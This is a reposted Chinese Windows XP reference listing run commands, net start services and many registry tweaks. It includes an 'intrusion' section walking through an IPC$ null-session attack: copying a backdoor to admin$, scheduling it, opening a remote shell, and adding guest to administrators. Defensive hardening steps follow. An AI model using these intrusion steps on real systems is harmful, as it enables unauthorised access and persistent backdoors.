(转)Windows XP系统总命令集合
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构(WMI)
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板
winmsd---------系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕“讲述人”
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介(安装完成后出现的漫游xp程序)
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------垃圾整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具,系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略
WINDOWS 2000/XP net start/stop命令系统服务
net start alerter /启动报警服务/
net start "client service for net ware" /启动netware服务/
net start "clipbook server" /启动剪切簿服务/
net start "compute browser" /启动计算机浏览器服务/
net start "dhcp client" /启动dhcp客户服务/
net start "directory replicator" /启动目录复制程序 ,将指定的文件复制到服务器上/
net start eventlog /启动事件日志服务,用于记录本地计算机上的事件/
net start "file server for macintosh" /启动macintosh服务,允许使用计算机共享文件/
net start "ftp publishing service" /启动ftp服务,在安装了internet信息服务才可用/
net start "gateway service for netware" /启动netware网关服务 在安装netware网关服务可用/
net start lpdsvc /启动tcpip打印机服务/
net start messenger /器东 信使 服务,向计算机发送消息/
net start "microsoft dhcp service" /启动microsoft dhcp/
net start "net logon" /启动网络登陆服务/
net start "network dde" /启动网络 DDE服务/
net start "ntlm security support provider" /启动ntlm安全支持提供服务/
net start ole /启动对象连接嵌入服务/
net start "print server for macintosh" /启动macintosh打印服务器服务/
net start "remote access connection manager" /启动远程访问连接管理服务/
net start "remote access isnsap service" /启动访问isnsap服务,在安装远程访问服务/
net start "remote procedure call (rpc) locator" /启动ppc定位器服务/
net start "remote procedure call (rpc) service" /启动远程过程调用(rpc)服务/
net start schedule /启动计划任务服务/
net start server /启动服务器服务,可以使用硬盘资源共享/
net start "simple tcp/ip servicer" /启动简单tcp/ip服务/
net start "site server ldap service" /启动 site server ldap服务/
net start snmp /启动snmp服务,向snmp管理系统报告当前状态/
net start "remote registry" /启动远程注册表服务/
net start spooler /启动后台打印机程序/
net start "tcp/ip netbios helper" /在tcp服务上启用netbios支持/
net start ups /启动不间断电源ups服务/
net start "windows internet name service" /启动windows internet服务/
net start workstation /启动工作站服务,工作站服务是用计算机可以直接使用网络资源/
net start telnet /启动telnet 服务,打开23端口/
net start lanmanserver /打开ipc服务/
net start msftpsvc /打开ftp命令/
net start termservice /启动win2k的终端控制/
net start smtpsvc /启动smtp日志记录/
入侵篇
相关命令
1)建立空连接:
net use //IP/ipc$ "" /user:"" (一定⒁?这一行命令中包含了3个空格)
2)建立非空连接:
net use //IP/ipc$ "用户名" /user:"密码" (同样有3个空格)
3)映射默认共享:
net use z: //IP/c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: //IP/c$
4)删除一个ipc$连接
net use //IP/ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
经典入侵篇
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1. C:/>net use //127.0.0.1/IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:/>copy srv.exe //127.0.0.1/admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:/winnt/system32/,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:/>net time //127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:/>at //127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:/>net time //127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:/>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:/>copy ntlm.exe //127.0.0.1/admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:/WINNT/system32>ntlm
输入ntlm启动(这里的C:/WINNT/system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:/>net user guest /active:yes
将对方的Guest用户激活
11. C:/>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码`
12. C:/>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
如何入侵139端口
通过139端口入侵,攻击者首先需要查找网络上存在139端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口扫描工具之一。在SuperScan开始IP地址中输入需要扫描的起始地址,然后在停止中填写好扫描结束的IP地址,然后单击[开始]按钮即可开始扫描。扫描结束后,在列表中可以查看目标主机打开的端口,每一个端口后面都有关于这个端口的简短说明
如果已经查获一台存在139端口漏洞的主机,这时就可以在命令行方式下使用“nbtstat -a [IP地址]”这个命令获得用户的信息情况,并获得攻击主机名称和工作组。接下来攻击者需要做的就是实现与攻击目标资源共享。使用Net View和Net user命令显示计算机列表和共享资源,并使用nbtstat -r和nbtstat -c命令查看具体的用户名和IP地址。
单击Windows桌面[开始]按钮,然后执行“查找/计算机”命令,填写刚才查找到的主机名称,就可以找到这台电脑了。双击主机名称即可打开指定的计算机。
防御篇
防范139端口攻击
对于139端口攻击的防范针对不同系统的设置也有所不同,下面就来分别描述。
针对使用Windows 9x系统拨号上网用户,可以不必登录到NT局域网络环境,打开控制面板,然后双击“网络”图标,在“主网络登录”中选择“Microsoft友好登录”,不必选择“Windows网络用户”方式。此外,也不必设置“文件打印共享
对于Windows NT用户,可以取消NetBIOS与TCP/IP协议的绑定,打开“控制面板”,然后双击“网络”图标,在“NetBIOS接口”中选择“WINS客户(TCP/IP)”为“禁用”,并重新启动计算机即可。
Windows 2000用户可以使用鼠标右键单击“网络邻居”图标,然后选择“属性”命令,打开“网络和拨号连接”对话框,用鼠标右键单击“本地连接”图标,然后执行“属性”命令,打开“本地连接属性”对话框(如图3)。双击“Internet协议(TCP/IP)”,在打开的对话框中单击[高级]按钮(如图4)。打开“高级TCP/IP设置”对话框,选择“选项”选项卡,在列表中单击选中“TCP/IP筛选”选项
单击[属性]按钮,在“只允许”单击[添加]按钮,填入除了139之外要用到的端口
使用防火墙防范攻击
对于个人上网用户可以使用“天网防火墙”定制防火墙规则。启动“天网个人防火墙”,选择一条空规则,设置数据包方向为“接收”,对方IP地址选“任何地址”,协议设定为“TCP”,本地端口设置为“139到139”,对方端口设置为“0到0”,设置标志位为“SYN”,动作设置为“拦截”,最后单击[确定]按钮,并在“自定义IP规则”列表中勾选此规则即可启动拦截139端口攻击了.
如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/LanmanServer/Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/LanmanServer/Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码
注册表篇
********系统文件夹:*********
名称 路径 含义
AppData C:\Windows\Application Data 应用程序
Cache C:\Windows\Temporary Internet Files 浏览器缓存
Cookies C:\Windows\Cookies
Desktop Desktop 桌面
Favorites Favorites 收藏夹
Fonts Fonts 字体
History History 历史文件夹
NetHood NetHood 网上邻居
Personal C:\My Documents 我的文档
PrintHood PrintHood 打印机
Program Start Menu\Programs 程序
Recent Recent 文档
SendTo SendTo 发送到
Start Menu Start Menu 开始菜单
Startup Start Menu\Programs\启动 启动组
Templates Temp 临时文件夹
******当需要修改这些系统文件夹的路径时,只需进入注册表的HKEY_CURRENT_USER\Software
\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 中修改相应的路径即可。
********系统特殊的文件夹*********
**********在我们的桌面上或其他地方有一些文件夹并不是真正的文件夹,它们只是一个用来
显示窗口文件夹内容的OLE对象,如“我的计算机”、“控制面板”等等,它们都有一个系统默
认的类ID类标识,windows在注册表的HKEY_CLASSES_ROOT\CLSID下定义这些类。**********
文件夹 类ID 说明
Control Panel {21EC2020-3AEA-1069-A2DD-08002B30309D} 控制面板
Dial-Up Networking {992CFFA0-F557-101A-88EC-00DD010CCC48} 拨号网络
Internet Explorer {BFB23B42-E3F0-101B-8488-00AA003E56F8} 浏览器
My Computer {20D04FE0-3AEA-1069-A2D8-08002B30309D} 我的电脑
Network Neighborhood {208D2C60-3AEA-1069-A2D7-08002B30309D} 网上邻居
Printers {2227A280-3AEA-1069-A2DE-08002B30309D} 打印机
Recycle Bin {645FF040-5081-101B-9F08-00AA002F984E} 回收站
Scheduled Tasks {D6277990-4C6A-11CF-8D87-00AA0060F5BF} 计划任务
My Documents {450D8FBA-AD25-11D0-98A8-0800361B1103} 我的文档
URLHistory Folder {FF393560-C2A7-11CF-BFF4-444553540000} URL历史
*************文件或其他对象的图标:*************
图标是一个文件或对象的标识。对于一个ICO文件只有一个唯一的图标, 可以用“路径\图标
文件名”来指示该文件的图标;对于EXE、DLL等文件,它们可能要包含不止一个图标,这时就
需要有一个索引标志来指明是第几个图标,可以用“路径\文件名,索引号”的形式来指示该
文件的图标。
如果要修改系统文件夹的图标,只需进入注册表的HKEY_CLASSES_ROOT\CLSID中,查找到系统
文件夹的类ID,然后修改 DefaultIcon中的图标文件路径即可;如果要修改其他文件的默认图
标则需要在HKEY_CLASSES_ROOT\CLSID\"文件类型"\DefaultIcon中修改图标文件的路径。
***************驱动器的自动运行功能************
打开CDROM的自动运行功能并且放入可以自动运行的光盘时,光盘上的程序会自动运行,那么其
他的诸入硬盘、移动盘等是否也可以自动运行哪?在注册表的HKEY_USERS\DEFAULT\Software
\Microsoft\Windows\CurrentVersion\Policies\Exploer下可以看到有一个
NoDriveTypeAutoRun的值项,其中的值就指明了可以自动运行的驱动器。该值项是一个4字节的
二进制值,第一字节的每位对应于不同的驱动器,如果对应位置为“1”则表示关闭自动运行功
能,如果对应位置为“0”则表示打开自动运行功能。下表是各位对应的驱动器类型
第0位:未知驱动器 第2位:可移动驱动器 第3位:硬盘
第4位:远程驱动器 第5位:CDROM驱动器 第6位:RAM驱动器
winxp系统注册表解释大全2(转)
**************系统****************
作 用:删除系统无用的动态链接库(DLL文件)
路 径:HEKY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLL
键值名称:
数据类型:
键 值:每个DLL文件的键值说明此DLL被几个应用程序共享
备 注:若为"01 00 00 00"则此DLL文件被一个应用程序共享。若为 "00 00 00 00"则该DLL文件
对系统不起作用,说明它是一个垃圾文件,删除该键值,并且记下 这个 DLL文件名,从
\windows\system文件夹中将该DLL文件删除。
作 用:你的名字放入系统任务栏
路 径:HKEY_CURRENT_USER\Control Panel\International
键值名称:键值:sTimeFormat="HH:mm:-Ss tt",s1159="CFAN",s2359="HELLO"
数据类型:
键 值:说明:12点之前,在系统任务栏中显示CFAN,之后则显示HELLO,可任意设置以达到自己
的效果
作 用:在每次退出系统时,自动清除文档菜单中的历史记录
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\Explorer]
键值名称:"ClearRecentDocsonExit"
数据类型:十六进制
键 值:01,00,00,00
作 用:禁止"系统"中出现"设备管理器"选项
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\System
键值名称:NoDevMgrPage
数据类型:DWORD
键 值:1
作 用:禁止"系统"中出现"文件系统"选项
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\System
键值名称:NoFileSysPage
数据类型:DWORD
键 值:1
作 用:禁止"系统"中出现"虚拟内存"选项
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值名称:NoVirtMemPage
数据类型:DWORD
键 值:1
作 用:禁止"系统"中出现"硬件配置文件"选项
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值名称:NoConfigPage
数据类型:DWORD
键 值:1
作 用:禁止在"系统属性"中出现"设备管理器"的菜单
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值名称:新建 "NoDevMgrPage"
数据类型:DWORD
键 值:设其值为"1"
作 用:禁止在"系统属性"中出现"文件系统"的菜单
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值名称:新建 "NoFileSysPage"
数据类型:DWORD
键 值:设其值为"1"
作 用:禁止在"系统属性"中出现"虚拟内存"的菜单
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值名称:新建 "NoVirtMemPage"
数据类型:DWORD
键 值:设其值为"1"
作 用:禁止在"系统属性"中出现"硬件配置文件"的菜单
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
键值名称:新建 "NoConfigPage"
数据类型:DWORD
键 值:设其值为"1"
作 用:改变系统的字体
路 径:HKEY_LOCAL_MACHINE\config\0001\Display\settings
键值名称:fonts.fon
数据类型:
键 值:默认vgasys.fon
作 用:设置用软盘快速启动系统的功能
路 径:HKEY_LOCAL_MACHINE\Config\0001\Enum\Bios\*PNP0700\0B
键值名称:FloppyFastBoost
数据类型:
键 值:值为01 00 00 00即可用软盘快速启动系统
作 用:系统不能访问硬盘
路 径:HKEY_LOCAL_MACHINE\Enum\PCI
键值名称:ChannelOptions
数据类型:hex
键 值:2
作 用:查看系统分配给光驱的可用盘符
路 径:HKEY_LOCAL_MACHINE\Enum\SCSI
键值名称:找到字符串UserDriveLetterAssignment
数据类型:
键 值:其值即表示系统分配给光驱的可用盘符,如果为HZ表示从H到Z可以给光驱使用。
作 用:在系统属性里显示更多的CPU信息
路 径:HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0
键值名称:"VendorIdentifier"
数据类型:
键 值:"Genuine Intel"(注意空格)
作 用:为系统增加启动时自动加载的程序
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\\Microsoft\Windows\CurrentVersion\Run
键值名称:新建主键,名自定
数据类型:
键 值:其值为"要执行文件的路径及文件名"
作 用:修改系统版权信息
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\DEVEOPER\SETUP
键值名称:想修改的键名
数据类型:字符串
键 值:输入修改值
作 用:查找系统的安装注册码
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
键值名称:ProductKey
数据类型:
键 值:值即是系统安装时必不可少的注册码。
作 用:让系统自动运行一次某个程序
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
键值名称:新建主键
数据类型:
键 值:其值为"要执行文件的路径及文件名"
作 用:Windows系统各目录位置
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
键值名称:
数据类型:
键 值:
作 用:系统可用盘符
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Currentversion\setup
键值名称:lastdrive
数据类型:
键 值:z
作 用:开机时自动登录系统
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon
键值名称:新建 "AutoAdminLogon" "DefaultPassword" "DefaultUserName"
数据类型:字符串
键 值:其值设为"1", 登录时的密码 , 登录时所用的用户名
作 用:让windows98系统自动登录
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon
键值名称:新建AutoAdminLogon DefaultUserName DefaultPassword
数据类型:字符串
键 值:键值设为1,默认的登录名,默认的口令,
作 用:优化文件系统
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem
键值名称:新建 "ConfigFileAllocSize"
数据类型:DWORD
键 值:设为"1f4"
作 用:系统使用语言
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
键值名称:默认值
数据类型:
键 值:"00000804"(简体中文),"00000404"(繁体中文),"00000411"(日文),"00000412"
(韩文),"00000409"(美国英语)
作 用:查看系统中的16位和32位.dll文件
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager
键值名称:"Known16DLLs"和"KnownDLLs"
数据类型:
键 值:分别包括了系统中的16位和32位.dll文件,用户可以对应查找。
作 用:查看系统中的16位和32位dll文件
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager
键值名称:"Known16DLLs"和"KnownDLLs"分别包含了系统中的16位和32位.dll文件,用户
可以对应查找
数据类型:
键 值:
作 用:推出系统时清除文档中的历史记录
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
键值名称:新建ClearRecentDocsonExit
数据类型:二进制
键 值:值为"01 00 00 00"
*****************网络***************
作 用:设置IE的自动拨号功能
路 径:HKEY_CURRENT_CONFIG\Software\Windows\CurrentVersion\Internet Settings
键值名称:"EnableAutoDial"
数据类型:二进制
键 值:值改为01 00 00 00
作 用:允许IE使用代理服务器
路 径:HKEY_CURRENT_CONFIG\Software\Windows\CurrentVersion\Internet Settings
键值名称:"ProxyEnable
数据类型:DWORD
键 值:值改为01 00 00 00
作 用:给IE5添加多个HTML编辑器
路 径:HKEY_CURRENT_USER\ Software\Microsoft\Internet Explorer\Default HTML Editor
\shell\edit
键值名称:command
键 值:将其值修改为DreamWeaver的绝对地址,并加上%1
备 注:如"c:\program files\macromedia\ dreamweaver 2\dreamweaver.exe %1"。
作 用:更改Outlook Express 的标题栏
路 径:HKEY_CURRENT_USER\Identities\{4C44D002-7BCF-11D3-9957-AB53DA238B0C}\Software
\Microsoft\Outlook Express\5.0
键值名称:新建"windowTitle"
数据类型:字符串
键 值:输入你想要的名称,如"XX的信箱"
作 用:更改Outlook Express5.0信箱存放路径
路 径:HKEY_CURRENT_USER\Identities\{4C44D002-7BCF-11D3-9957-AB53DA238B0C}\Software
\Microsoft\Outlook Express\5.0
键值名称:"Store Root"
数据类型:字符串
键 值:修改为要修改的路径。
作 用:用Outlook Express收信时跳过无法收取的帐号
路 径:HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager
键值名称:展开那个须跳过的帐号所对应的子键,其下"POP3 Skip Account"
数据类型:DWORD
键 值:值由0改为1
作 用:清除IE网址输入下拉列表中的网址
路 径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
键值名称:TypedURLs
键 值:删除其下对应的网址即可
作 用:设置IE的缺省下载目录
路 径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
键值名称:DownLoadDirectory
键 值:修改其值
作 用:在IE中显示URL地址全名
路 径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
键值名称:Show_FullURL
键 值:值改为Yes
作 用:退出IE时保存历史网址内容
路 径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\main
键值名称:Save_Session_History_On_Exit
键 值:值改为Yes
作 用:修改IE4的搜索引擎
路 径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl
键 值:把"默认"改为你定义的搜索引擎,如http://gbchinese.yahoo.com/
作 用:改变IE的背景位图
路 径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar
键值名称:新建BackBitmap
数据类型:字符串
键 值:"BMP文件路径"
作 用:禁止Outlook Express彩色消息背景
路 径:HKEY_CURRENT_USER\Software\Microsoft\Internet Mail and News
键值名称:ColorCycle
数据类型:字符串
键 值:0
作 用:更改Outlook Express的邮件存放目录
路 径:HKEY_CURRENT_USER\Software\Microsoft\Outlook Express
键值名称:Store Root
键 值:值改为所需的文件路径即可
作 用:禁止Outlook Express的启动画面
路 径:HKEY_CURRENT_USER\Software\Microsoft\Outlook Express
键值名称:NoSplash
数据类型:DWORD
键 值:1
作 用:Outlook Express的标题栏
路 径:HKEY_CURRENT_USER\Software\Microsoft\Outlook Express\
键值名称:WindowTitle
数据类型:字符串值
作 用:删除IE
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名称:NoInternetIcon
数据类型:DWORD
键 值:1
作 用:如何重装IE
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer
键值名称:Version
数据类型:字符串
键 值:表示IE的版本号,改小一点儿就行了
作 用:定制IE地址
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLS
键值名称:新值#1
数据类型:
键 值:改为你要给指向的网页(网址)取的名字。在"键值"栏中输入网址
备 注:
作 用:定制IE标题
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main
键值名称:新建"window Title"
数据类型:字符串
键 值:串值内容改为你想要的文字
备 注:
作 用:增加IE4 的自动搜索功能
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\UrlTemplate
键值名称:新建字符串,然后输入一个顺序号
数据类型:
键 值:输入你想要的自动搜索网址的其它部分的字符,比如支持中国的域名是:www.%s.com.cn。
备 注:
作 用:修改IE5.0的搜索引擎
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search
键值名称:
数据类型:
键 值:把"CustomizeSearch"、"SearchAssistant"改为你定义的搜索引擎
备 注:
作 用:更改IE4.0的安全口令
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
键值名称:Ratings子键
数据类型:
键 值:删除
备 注:
作 用:IE的分级审查口令
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings
键值名称:用鼠标选中右半窗口里的名称记录,按下Del键进行删除
数据类型:
键 值:
备 注:
作 用:巧解IE的分级审查口令
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings
键值名称:右半窗口里的名称记录
数据类型:
键 值:删除
作 用:删除IE4.0的安全口令
路 径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies]
键值名称:Ratings
数据类型:
键 值:删除
备 注:
作 用:IE慢慢刷新
路 径:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Control\
键值名称:Update
数据类型:
键 值:1
备 注:
作 用:IE起始网页位置
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main
键值名称:-Sart page
数据类型:
键 值:更改其下的键值即可完成对默认主页的更改
备 注:
作 用:IE脱机无法登录显示的网页
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main
键值名称:Local Page
数据类型:
键 值:改成你想要的页就可以成为当你脱机浏览一个未去过的网页时所显示的页面
备 注:
作 用:IE的地址历史记录位置
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\TypedURLs
键值名称:删除其下的所有的键名和键值!重启后你的IE 地址栏就不会再有什么历史地址了
数据类型:
键 值:
备 注:
作 用:Outlook Express邮件目录
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Outlook Express
键值名称:Store Root
数据类型:
键 值:
备 注:
作 用:Outlook Express邮件签名
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Outlook Express\Mail
键值名称:Signature Text
数据类型:
键 值:
备 注:
作 用:Outlook Express的配置全面备份
路 径:HKEY_USERS\.DEFAULT\SOFTWARE\MICROSOFT\OUTLOOK EXPRESS\MAIL\INBOX RULES
键值名称:
数据类型:
键 值:导出注册表文件
备 注:
作 用:Outlook Express新闻贴签名
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Outlook Express\News
键值名称:Signature Text
数据类型:
键 值:
备 注:
作 用:Outlook Express的Cache目录
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\Shell Folders
键值名称:Cache
数据类型:
键 值:
备 注:
作 用:Outlook Express的Cookies的目录
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\Shell Folders
键值名称:Cookies
数据类型:
键 值:
备 注:
作 用:Outlook Express的历史目录
路 径:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\Shell Folders
键值名称:History
数据类型:
键 值:
备 注:
作 用:清理访问"网络邻居"后留下的信息
路 径:HEKY_CURRENT_USER\Network\Recent
键值名称:在右窗格中选择要删除的选项
数据类型:
键 值:删除
备 注:
作 用:修改"拨号网络"的名称
路 径:HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48
键值名称:"默认"
数据类型:
键 值:值更改为需要的键值
备 注:
作 用:为网络蚂蚁的下载过程加入提示声
路 径:HKEY_CURRENT_USER\AppEvents\Schemes\App\Netants
键值名称:其下有NAAddFile、NADownloadFail和NADownloadSuccess三个子键,分别表示
Netants中加入下载文件、下载失败和下载成功这三个事件。只要将其下的.current子键
的"默认"键值改为自己喜欢的wav文件即可
数据类型:
键 值:
备 注:
作 用:网页历史纪录
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
键值名称:History
数据类型:
键 值:
备 注:
作 用:隐藏"网上邻居"中的"整个网络"
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
键值名称:新建NoEntireNetwork
数据类型:DWORD
键 值:值设为"1"时为有效
备 注:
作 用:禁止使用"网上邻居"
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
键值名称:"NoNetHood"
数据类型:DWORD
键 值:00000001
备 注:
作 用:隐藏"网上邻居"中的工作站显示
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Networkr
键值名称:新建NoWorkgroupContents
数据类型:DWORD
键 值:值设为"1"时为有效
备 注:
作 用:禁止更改网络设置
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
